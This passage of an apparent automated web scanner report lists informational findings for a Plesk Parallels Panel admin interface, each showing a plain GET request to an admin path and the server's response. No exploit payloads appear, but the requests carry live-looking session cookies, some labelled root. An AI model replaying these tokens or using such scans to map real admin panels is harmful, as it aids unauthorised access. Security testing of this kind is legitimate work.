...[SNIP]...

12.55. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/tools  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/server/tools

Request

GET /admin/server/tools?context=tools HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=settings

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:13:51 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:13:51 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:13:51 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.56. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/subscription/

Request

GET /admin/subscription/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:38:11 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:38:15 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:38:15 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.57. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/create  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/subscription/create

Request

GET /admin/subscription/create HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sun, 23 Oct 2011 19:25:30 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:25:30 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:25:30 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.58. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/subscription/list

Request

GET /admin/subscription/list?context=subscriptions HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=domains

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:13:51 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:13:51 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:13:51 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.59. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/subscription/list/

Request

GET /admin/subscription/list/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:37:30 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:37:37 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:37:37 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.60. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list/reset-search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/subscription/list/reset-search/

Request

GET /admin/subscription/list/reset-search/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:37:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:37:36 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:37:36 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.61. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list/reset-search/true/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/subscription/list/reset-search/true/

Request

GET /admin/subscription/list/reset-search/true/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sun, 23 Oct 2011 19:19:20 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:19:20 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:19:21 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.62. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/subscription/login

Request

GET /admin/subscription/login?returnUrl=/admin/home/admin HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: Keep-Alive
Cookie: locale=en-US; PHPSESSID=539f3ab261e99e4b19efbd260df0b45d; psaContext=home; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 18:55:45 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 18:55:45 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 18:55:45 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.63. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/app/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /app/

Request

GET /app/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=d8ba52f4ed7d0d502435be2945503b28; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 12:14:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.64. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/app/get-updates-data/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /app/get-updates-data/

Request

GET /app/get-updates-data/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/app/usage
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:27:17 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.65. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/app/info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /app/info/

Request

GET /app/info/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:27:17 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.66. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/app/info/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /app/info/id/

Request

GET /app/info/id/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/app/usage
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:27:17 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.67. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/app/market/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /app/market/

Request

GET /app/market/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=d8ba52f4ed7d0d502435be2945503b28; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 12:14:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.68. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/app/market/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /app/market/id/

Request

GET /app/market/id/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=d8ba52f4ed7d0d502435be2945503b28; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 12:14:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.69. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/app/market/id/marketplace  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /app/market/id/marketplace

Request

GET /app/market/id/marketplace HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=d8ba52f4ed7d0d502435be2945503b28; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 12:14:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.70. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/app/usage-data  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /app/usage-data

Request

GET /app/usage-data HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/app/usage
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:27:17 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.71. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/bin/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /bin/

Request

GET /bin/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
